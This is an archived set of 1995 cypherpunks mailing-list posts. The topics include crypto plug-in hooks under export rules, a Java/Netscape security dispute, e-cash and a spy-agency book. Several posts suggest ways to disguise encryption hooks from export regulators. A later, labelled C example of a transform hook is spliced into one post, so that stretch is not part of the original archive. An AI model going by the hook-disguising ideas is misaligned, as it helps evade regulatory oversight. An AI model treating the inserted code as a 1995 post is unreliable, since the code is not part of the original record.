tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 19 Nov 1995 08:57:45 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>
Message-ID: <9511170143.AA07316@doom>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 16 Nov 1995, Scott Brickner wrote:
> > 
> > You'd need a program which not only *accepted* the additional parameter,
> > but also *needed* the second parameter.  I confess I have some difficulty
> > thinking of one.
> 
> It's not too hard to think of a compression scheme that needs extra 
> information to be passed from client to server; the obvious example is 
> some sort of dictionary compression with external dictionaries (can be 
> very effective for short messages where LZW etc never get a chance to get 
> going). 
> 
> Another, more likely case, is where the object could have been compressed 
> by several schemes, and a scheme ID is needed to determine which 
> algorithm to use. 

But the problem is more on the application side than on the library
side.  If necessary, you can simply design the plug-in crypto function
to regard the first n bytes of the input buffer as a key.  On the
other hand, how do you explain why your application (for which you're
seeking export approval) is generating keys in the first place?  And
what's this other piece of code over here that just sits around and
captures mouse movements at random intervals? :)

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Fri, 17 Nov 1995 11:25:40 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511170156.RAA17754@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I keep telling you people.. if you keep giving Fred the attention, he
is never going to go away. It's blindingly obvious that he doesn't know
his ass from a hole in the ground, but if you keep telling him that,
it's just going to encourage him to post more, post more frequently, and
make a bigger fool of himself than he already has. Just ignore
everything he says. Make a proc-mail script to send his mails to
/dev/null or send them through the text-to-hick filter. But whatever
you do, do *not* send him money, do *not* feed him, and *never* *ever*
no matter how much he begs, no matter how much he pleads, *NEVER*
reply to this man's messages.

We need one of those little posters like the "Do not take checks from
this man" ones in the grocery store.

Christopher

> > 3.  Postscript considered dangerous:   (insert-smiley) 
> > 
> > As for the question of someone invoking a postscript interpreter via a
> > browser and thus opening up their system to some rogue postscript
> > file: I think it would be great if either of these two things were to
> > magically happen:
> > 
> > 	1) people would stop putting postscript docs on web pages
> > 	because it's the wrong technology for WWW - it wastes
> > 	bandwidth - it's hard to view & hence often ugly - everyone
> > 	just prints it out anyway and then complains because there
> > 	is no one "standard" implementation of postscript printing
> > 	worldwide and there are dozens of minor problems
> > 
> > 	2) someone could implement a secure postscript previewer
> > 	(whatever that means!) 
> > 
> > I doubt either of those two things will happen.  The average Jo on the
> > internet needs to understand that when s/he downloads binary files
> > over the internet and run them from insecure programs on their local
> > computer, well, s/he runs some risk.  This risk might be tiny, but
> > it's impossible to quantify loss.  If I lose a poem that I'm writing,
> > to me that's priceless, so I do not intend to imply that loss of data
> > isn't tragic for the person who loses it.  If you have data you can't
> > bear to lose, be sure to practice safe computing.  Perform backups
> > regularly, and use judgement about which interpreters and executable
> > programs you allow to run on your PC.
> > 
> > Marianne
> 
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscape, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 18 Nov 1995 09:31:27 +0800
To: cypherpunks@toad.com
Subject: [BOOK] "SPYWORLD" (was: Re: CSE gets flak on TV)
Message-ID: <v03003d00acd17b14cfc4@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:
>On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:
>
>>  Electronic snooping part of the game
>>
>>  OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>>  high-tech spy agency snoops on friendly countries for financial gain.
>
>No big secret??  It was news to me. ;-)                        [elided]

Dear Alice,

To the few on the list who have not already had the pleasure, I'd put
"SPYWORLD" in the "Puzzle Palace" category of must-reads. Before recently
leaving our own Wunderland for a course in advanced bird-watching off in
the Canary Islands, Michael Sattler was kind enough to loan me his
hardcover of this pithy little 1994 history/expose on the Canadian spook
community by one of their first key propeller-heads, "Mike Frost." After
being unceremoniously dumped by the Canucks a few years back, he decided to
"share" about it all to work out his frustrations. Though I assume it was
'tidied up' by various government censors in pre-publication, and according
to the inside page was printed and "bound in the U.S.A." ;), I must say it
was nevertheless an arousing read, albeit a bit nit-sloppy with the ghost
writing/editing here and there.

It paints a colorful picture of the TLA gang-bang that resulted in the
conception of the Canadian black budget intercept operations. The potent
schtuppingvermachen of the American and British, each waiting patiently for
sloppy seconds is, to say the least, pruriently fascinating. "Frost"
manages to (un)cover, in pleasurably lurid detail, some of the tools used,
and policies openly violated, during such intercepts as "Stephanie" in
Moscow. There are even some descriptions of the scenes behind the green
doors of the NSA and CIA. Frankly, all it really lacks is a nude picture of
the American Ambassador in Ottawa pulling his pants up _before_ drawing the
shades for the last time. If you do read it, use protection.  ;)

"SPYWORLD"
 Subtitle: Inside the Canadian and American Intelligence Establishments
 By: "Mike Frost" as told to Michel Gratton
 ISBN 0-385-25494-6
Publisher:
 Doubleday Canada Ltd.
 105 Bond Street
 Toronto, Ontario
 M5B 1Y3


   dave

PS: Don't worry, Mike, none of the pages stick together. :)


_______________________________________________________________________
"If you're ever robbed of your virtue, trust me: it was an inside job."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 17 Nov 1995 11:40:03 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <9511161831.ZM14572@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Nov 16,  4:08pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: Java & Netscape security (reply to misc. postings)
> > 3.  Postscript considered dangerous:   (insert-smiley)
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscape, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

Alright. I've lurked on this one-man issue long enough. The latest attack
was severely lacking in clue. Had Dr. Fred bothered to read EVEN the
.sig file, he *might* have noticed that Marianne works for SUN [three
letters], not Netscape [eight letters].

He *might* have noticed that she was writing from her personal account.

Perhaps Dr. Fred fails to realise that some people *aren't* speaking
for their entire company every time they write e-mail. [see fc.all.net--
i always enjoy pronouncing that nearly phonetically]

Dr. Fred will forward this `official Netscape line' to Netscape,
probably with the similar lack of proper attribution or recognition
of context. We can hope that the receiving end of Netscape possesses at
least those few cluons more which are required to realise how far off
*anything* Dr. Fred is now writing.

To have some slight cpunks relevance, I will weigh in on the side of
`It's not X's responsibility to ensure that Y's software isn't broken.'
{for all X, Y in {software developers}} Why? For the same reason that
I'm not generally held accountable for, say, Gary Jeffer's opinions
or Tim May's: because I don't have any control over them.

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 17 Nov 1995 11:47:12 +0800
To: Philip Nesser <pjnesser@ns.Rocket.Com>
Subject: Re: primality code
In-Reply-To: <9511161826.AA10763@asgaard.rocket.com>
Message-ID: <Pine.SUN.3.91.951116182725.4040C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Philip Nesser wrote:

> Can someone point me in the right direction for any archives of code to do
> primality testing?  I would rather not have to write something from
> scratch.

You may want to try my Crypto++, which includes, among other things, a 
bignum package and an implementation of the Rabin-Miller compositeness test.

See http://www.eskimo.com/~weidai/cryptlib.html for more information.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 06:46:12 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <m0tGGn7-0008x9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 16 Nov 1995, Scott Brickner wrote:
>> 
>> You'd need a program which not only *accepted* the additional parameter,
>> but also *needed* the second parameter.  I confess I have some difficulty
>> thinking of one.
>
>It's not too hard to think of a compression scheme that needs extra 
>information to be passed from client to server; the obvious example is 
>some sort of dictionary compression with external dictionaries (can be 
>very effective for short messages where LZW etc never get a chance to get 
>going). 
>
>Another, more likely case, is where the object could have been compressed 
>by several schemes, and a scheme ID is needed to determine which 
>algorithm to use. 
>
>The real issue would appear to be intent, though. If it's obvious that 
>the real intention for the hook is to allow encryption to be added, 
>the State department can jump on it. 

I'm not a programmer, but it seems to me that if the goal is to minimize the
"obviousness" of the provision for cryptography, the calling program could
call the called program (which might be an encryption program, maybe not)
and ask for a text header that is to be listed in a Windows-type window.
Thus, the calling program would not have any references to "encryption" or
"key" in its program or documentation; it would get that the first time it
calls the called program.  

BTW, one function which obviously  needs an additional argument to work is a
CRC program, in which the particular polynomial to be used must be
specified.  And I guess that a CRC is basically the same type of thing as a
hash function, too.
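
Added example (not part of the original post, and not any poster's code): a C illustration of the three-argument hook shape quoted earlier in this thread, with a run-length compressor that ignores the third argument and a CRC that needs it to carry the polynomial, as the message above suggests. The DataSource/DataSink layouts, CrcParams and all function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical in-memory stand-ins for the DataSource/DataSink types
   named in the quoted interface. */
typedef struct { const uint8_t *data; size_t len; } DataSource;
typedef struct { uint8_t *data; size_t cap; size_t len; } DataSink;

/* Same shape as the quoted hook: source, sink, opaque third argument.
   The host passes the pointer through and never looks inside it. */
typedef int (*transform_fn)(const DataSource *, DataSink *, void *);

static int sink_put(DataSink *s, uint8_t b) {
    if (s->len >= s->cap) return 0;          /* refuse to overflow the sink */
    s->data[s->len++] = b;
    return 1;
}

/* Run-length encoder emitting (count, byte) pairs.
   A transform of this kind never touches the third argument. */
int rle_encode(const DataSource *src, DataSink *dst, void *unused) {
    (void)unused;
    size_t i = 0;
    while (i < src->len) {
        uint8_t b = src->data[i];
        size_t run = 1;
        while (i + run < src->len && src->data[i + run] == b && run < 255)
            run++;
        if (!sink_put(dst, (uint8_t)run) || !sink_put(dst, b)) return 0;
        i += run;
    }
    return 1;
}

/* Parameters a CRC plug-in genuinely needs: which polynomial to use
   (given in reflected, least-significant-bit-first form). */
typedef struct { uint32_t reflected_poly; } CrcParams;

/* Bitwise 32-bit CRC; writes the 4-byte result big-endian to the sink.
   Fails if the caller supplied no parameters. */
int crc32_transform(const DataSource *src, DataSink *dst, void *opaque) {
    const CrcParams *p = opaque;
    if (p == NULL) return 0;
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < src->len; i++) {
        crc ^= src->data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ (p->reflected_poly & (0u - (crc & 1u)));
    }
    crc ^= 0xFFFFFFFFu;
    for (int shift = 24; shift >= 0; shift -= 8)
        if (!sink_put(dst, (uint8_t)(crc >> shift))) return 0;
    return 1;
}

/* Host side: run any hook over a string; returns bytes written, 0 on failure. */
size_t run_hook(transform_fn fn, const char *text, void *opaque,
                uint8_t *out, size_t cap) {
    DataSource src = { (const uint8_t *)text, strlen(text) };
    DataSink dst = { out, cap, 0 };
    return fn(&src, &dst, opaque) ? dst.len : 0;
}

/* Convenience wrapper: CRC of a string for a given reflected polynomial. */
uint32_t crc_via_hook(const char *text, uint32_t reflected_poly) {
    CrcParams p = { reflected_poly };
    uint8_t out[4];
    if (run_hook(crc32_transform, text, &p, out, sizeof out) != 4) return 0;
    return ((uint32_t)out[0] << 24) | ((uint32_t)out[1] << 16) |
           ((uint32_t)out[2] << 8) | (uint32_t)out[3];
}

int main(void) {
    uint8_t out[16];
    size_t n = run_hook(rle_encode, "aaabcc", NULL, out, sizeof out);
    printf("RLE wrote %zu bytes, third argument unused\n", n);
    printf("CRC-32  (poly 0xEDB88320): %08X\n",
           (unsigned)crc_via_hook("123456789", 0xEDB88320u));
    printf("CRC-32C (poly 0x82F63B78): %08X\n",
           (unsigned)crc_via_hook("123456789", 0x82F63B78u));
    return 0;
}
```

The same input yields different checksums under the two polynomials, so the extra argument is doing real work for the CRC while the compressor runs with NULL.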





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Fri, 17 Nov 1995 12:51:37 +0800
To: cypherpunks@toad.com
Subject: Security via Sounding Impressive
Message-ID: <199511170351.TAA26249@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've noticed an interesting pattern in how security mechanisms are named.
On the one hand, we have some security features with very impressive sounding
names:

Certification *Authority*
*Authorization*
*Trusted* Server
*Master* Key
etc.

These words fill most people (many on this list are exceptions)
with awe and good will towards the feature so named. They also 
make good channel markers, pointing out the _insecure_ parts 
of the system.  The effect is to cover up the lack or inadequacy 
of a mechanism with invocations that put your brain to sleep. This 
is quite lucrative for marketing purposes, but it works on
many designers of security features as well!

On the other hand, when we isolate the actual mechanisms of a system
that are in fact mathematically secure, we get names like:
 
Encryption
Blinding
Message Digest
Mix
Capability

These are just plain, boring words, with no connotation that we should
trust them like we trust our big brother.  They just work.
 
Nick Szabo					szabo@netcom.com
Internet Commerce & Security consulting -- e-mail for details




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Fri, 17 Nov 1995 11:40:55 +0800
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162017.ZM29217@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


*sigh* yet another rambling non-sequitur from Dr. Fred.  time to re-activate
my kill-file...
--

o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
o       E-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               Vox:  708.435.7076   Fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Thu, 16 Nov 1995 18:33:23 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511161019.VAA16813@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Gidday Greg

You wrote..
>Most consumer-level transactions are based on a general sort of 
>trust-in-human-nature sort of policy, backed up by the knowledge that a single
>failed transaction (or even a constant low level of failed transactions, where
>failed == "didn't get paid but gave the stuff away") isn't likely to kill off
>a business or even make it unprofitable.

Failed transactions are more likely to affect consumer confidence than
trader confidence.  I have yet to find a site on the net where goods are
shipped before receiving payment, therefore the 'at risk' party is the
buyer. Cybertraders will need to establish a level of credibility and
reliability on a par with their terrestrial cousins.  Cyberbuyers will need
to be confident in their ability to call upon yet unwritten international
laws to gain a refund or replacement when goods and services don't arrive as
advertised.

BTW do you want to buy a really big rock way out in the middle of nowhere?  [:>)

cheers

Peter








                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 17 Nov 1995 10:56:01 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162021.ZM15853@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


We see enough press releases around here that we can recognise pronouncements
from the mouth of a computer company and those from individuals who happen
to work for a company.

On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> 	So your claim is that Unix is perfectly secure for networking,
> because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> and all those other add-on software pieces, if your users act perfectly
> and nobody ever makes a mistake, you are safe from known attacks.

Nope. Claim is roughly along the lines of, unix is incredibly insecure
for networking, because of inetd, sendmail, ident, httpd ... but *if*
there's a bug in sendmail, the trouble is not with the poor sod who
put file access into the kernel, and definitely not with the person
who wrote pine--even though pine calls sendmail.

> [summary of rest: postscript bad]

As you finally concluded, the problem is the web browser. I concede that
a web browser is a security hole by its very nature in that it makes it
a lot easier for anyone to grab anything from anywhere. (This is also
why web browsers would be unpopular with censors, if censors thought they
could get anywhere by arguing against web browsers instead of sites.)

Since you've now stated that the web browser is wrong and evil and bad,
perhaps it's time you explained your fix for the web browser. The
millions of users, even if they *aren't* the problem, even if they *are*
blameless for blindly accepting anything anyone sends them, even if they
are faultless to ignore any notes on security or care which come with web
browsers--despite all of this--will still want something like a web browser.

Your argument seems to be running to "users are stupid", but it's the
developer's fault that users are stupid, and the developer should protect
the user in all cases from their own stupidity.

People shouldn't make web browsers, because web browsers, in untrained hands,
can damage computers.
People shouldn't make guns, because guns, in untrained hands, can damage
computers.

I would say that connectivity is risk, and that those who want connectivity
must weigh those risks. I think most people weigh the risks of Netscape
et al. and say, "the benefits offset the risks."

richard

[web browsers don't destroy hard drives, numbskulls with mice do]

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvjYx1gtCYLvIJ1AQEjawP/WQh2UW4zDJpwQvObG1FLBGWwXZx0tV9S
EnkUCRJfqQvaDUWRuyKdyjffYIiwthbCUPyblLcNtj608b1skyledUm7ZNGRsn3m
F+nJ8CNLU7MFhPIiknY5HvjiNE+LCgLibIZRg4LfGAJ2cEScDBOq5JFp8E/9NycX
xUSIVSCVP3g=
=1Q1b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 17 Nov 1995 13:06:55 +0800
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Java & Netscape security (reply to misc. postings)
Message-ID: <199511170439.UAA19926@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
(possibly faulty) understanding of Java security is that it will not allow
an applet to speak to IP addresses other than the one it was loaded from. 
I have a question:

Doesn't this restriction prevent an applet from checking some ecash it has
just received for validity with a bank computer?

Thanks - Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 11:58:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <acd0ba0e02021004a15b@[205.199.118.202]>
Message-ID: <199511170520.VAA28087@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 3. The success of BankAmericard (later renamed Visa) came when real
> customers and real shops started to use it, not when early pioneers set
> themselves up as clearinghouses and whatnot.

	I'm sorry, but Community ConneXion is a real shop, with real
customers, selling real services, and we accept ecash. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 17 Nov 1995 11:50:08 +0800
To: tms@TIS.COM (Thomas M. Swiss)
Subject: Re: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511170243.VAA06078@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If you have some personal data that includes your patient
number, why not have a card that instead lists your important data?
"This patient is diabetic, allergic to amoxicillin, and has Gold Cross
insurance." 

	The amount of important data that an ER needs is small.  There
is small benefit to building a huge infrastructure to get that data
carted around.  Also, in ERs, the computers are often authorized the
same way everything else is: a nurse will tell you to leave if you
don't belong there.

	At Defcon, Bruce Schneier was talking about the value stored
in casino chips.  It's staggering.  It's an alternate cash system, with
a huge float, astounding velocity, and very little fraud.  Transaction
costs are low, clearing is instantaneous.  The comparison is fairly
clear.

Adam

Thomas M. Swiss wrote:

|      I very much want hospitals to have fast access to my medical data if
| my broken and bleeding body should come through their door, even if I am
| unconscious and my personal physician cannot be reached. On the other hand,
| I don't want anyone to be snooping through them right now.

|      So, what if my records were available on the net, but encrypted with a
| key known to my physician and an escrow agency? (Equivalently, they
| could be on that smartcard, but encrypted.) If an emergency occurs, the
| hospital fetches my encrypted records from my physician's server, then
| sends a message (signed with the hospital's key) to Keys R Us, the escrow
| agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
| key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
| Inc., insurance card lists my physician's server, the escrow agency, and my



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Fri, 17 Nov 1995 12:14:24 +0800
To: "Richard Martin" <rmartin@aw.sgi.com>
Subject: Re: Java & Netscape security  [NOISE]
Message-ID: <v02120d00acd1aa2c9cf1@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


<plonk>! I'm so tired of listening to this no-researching,
no-paying-attention, out-to-make-money freak I just can't
stand it. Consider Mr. fc@all.net hereby removed from my
mailbox by virtue of the autofiltering capability of my
lovely mailreader.

Fred: *RTFWP* and stop complaining about things you know
nothing about. Feh.


Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 17 Nov 1995 09:25:44 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511162243.A5545-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995, Scott Brickner wrote:

> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

How about command-line compression options. Gzip, for example, allows you
to specify how good you want the compression to be, with better
compression taking longer. So you could justify passing a set of options
to the compression algorithm, which could also be used to pass key 
information to the encryption algorithm. In fact, you could pass in a 
void * pointer to options that had been set up in a preferences panel in 
the application, which would be provided by the plug-in compression or 
encryption code. That structure could then have anything you wanted in it.

Also, I'm not sure you'd need to pass a key, surely the encryption code 
could do all the key-handling itself ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 15:06:16 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <acd16c9506021004ccb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:20 AM 11/17/95, sameer wrote:
>>
>> 3. The success of BankAmericard (later renamed Visa) came when real
>> customers and real shops started to use it, not when early pioneers set
>> themselves up as clearinghouses and whatnot.
>
>        I'm sorry, but Community ConneXion is a real shop, with real
>customers, selling real services, and we accept ecash.

You guys are getting way too sensitive about all this.

I'm in favor of real shops selling real things or real services. My point
was that there is no compelling need to get people to sign up just for
moral support.

Lighten up.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 13:04:14 +0800
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511162021.ZM15853@glacius.alias.com>
Message-ID: <9511170355.AA28616@all.net>
MIME-Version: 1.0
Content-Type: text


...
> On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> > 	So your claim is that Unix is perfectly secure for networking,
> > because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> > and all those other add-on software pieces, if your users act perfectly
> > and nobody ever makes a mistake, you are safe from known attacks.
> 
> Nope. Claim is roughly along the lines of, unix is incredibly insecure
> for networking, because of inetd, sendmail, ident, httpd ... but *if*
> there's a bug in sendmail, the trouble is not with the poor sod who
> put file access into the kernel, and definitely not with the person
> who wrote pine--even though pine calls sendmail.

But of course, the sendmail problems are all related to other problems with
Unix, and the common thread to all of the sendmail attacks is Unix, so many
people blame Unix, not sendmail (although I think there is enough blame to
go around).

> > [summary of rest: postscript bad]
> 
> As you finally concluded, the problem is the web browser. I concede that
> a web browser is a security hole by its very nature in that it makes it
> a lot easier for anyone to grab anything from anywhere. (This is also
> why web browsers would be unpopular with censors, if censors thought they
> could get anywhere by arguing against web browsers instead of sites.)

Grabbing anything from anywhere isn't the problem.  The problem is how you
interpret it.  Information only has meaning in that it is interpreted.

> Since you've now stated that the web browser is wrong and evil and bad,
> perhaps it's time you explained your fix for the web browser.

I didn't say wrong, evil, or bad.  I only said insecure.  My complaints
against Netscape and Sun are not that their Web browsers are insecure -
it is that they are selling these browsers based on security.  The
general public, and most of the users in the world, don't perceive the
difference between SSL and Java and secure - they hear that SSL makes
them safe, that Java makes them safe, and they believe it. 

> The
> millions of users, even if they *aren't* the problem, even if they *are*
> blameless for blindly accepting anything anyone sends them, even if they
> are faultless to ignore any notes on security or care which come with web
> browsers--despite all of this--will still want something like a web browser.

It's like selling me a gun and calling it safe because it has a safety on it.
The safety doesn't make a gun safe, it only makes it safer against particular
classes of problems.  Gun sellers don't call guns safe, and neither should
sellers of Web browsers.

> Your argument seems to be running to "users are stupid", but it's the
> developer's fault that users are stupid, and the developer should protect
> the user in all cases from their own stupidity.

If the user claims to provide safety, that should apply to the least
knowledgeable user, not only to the most knowledgeable.  Almost any
system can be operated securely by the most knowledgeable user.  That's
not the market Netscape and Java are aimed toward.

> People shouldn't make web browsers, because web browsers, in untrained hands,
> can damage computers.
> People shouldn't make guns, because guns, in untrained hands, can damage
> computers.

I said neither.  I said that people shouldn't claim that Web browsers
are safe just because they have some safety features.  The same applies
to guns. 

> I would say that connectivity is risk, and that those who want connectivity
> must weigh those risks. I think most people weigh the risks of Netscape
> et al. and say, "the benefits offset the risks."

If that were true, I wouldn't have a real problem with it, but it's not
true.  Most people don't understand the risks.  In fact, even most
people on this list apparently don't understand the risks.  People see
benefits because they pop out at them on the screen.  People only see
risks when they get burned by them and are aware of it.

I think that very few people weigh the risks of Netscape/HotJava because
almost nobody is even aware of them.  Of the people that do weigh the
risks, many of them listen to people who say that Netscape/Java is
secure.  Very few of them pay real attention to the details of what is
actually claimed about security.

Then we have the people at Netscape/Sun and many of the people on this
list who keep telling people that these products are secure.  We hear
again and again that they should blame any negative results of using
these products on their users and the copy of ghostscript or postscript
they imported to make their browser read the files they want to read. 

If companies claim a secure browser, it should be secure regardless of
the typical errors and omissions made by the least sophisticated user.

> [web browsers don't destroy hard drives, numbskulls with mice do]

Current Web browsers are unsafe - so are most current users.  Bullets
kill people, but for the most part, people pull the triggers, and a gun
is the enabling technology.  When you hand millions of people who know
nothing about guns with loaded Uzis and put them into crowds, you can
hardly claim no responsibility when they start shooting each other. 

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 17 Nov 1995 12:55:28 +0800
To: Steve Champeon <schampeo@imonics.com>
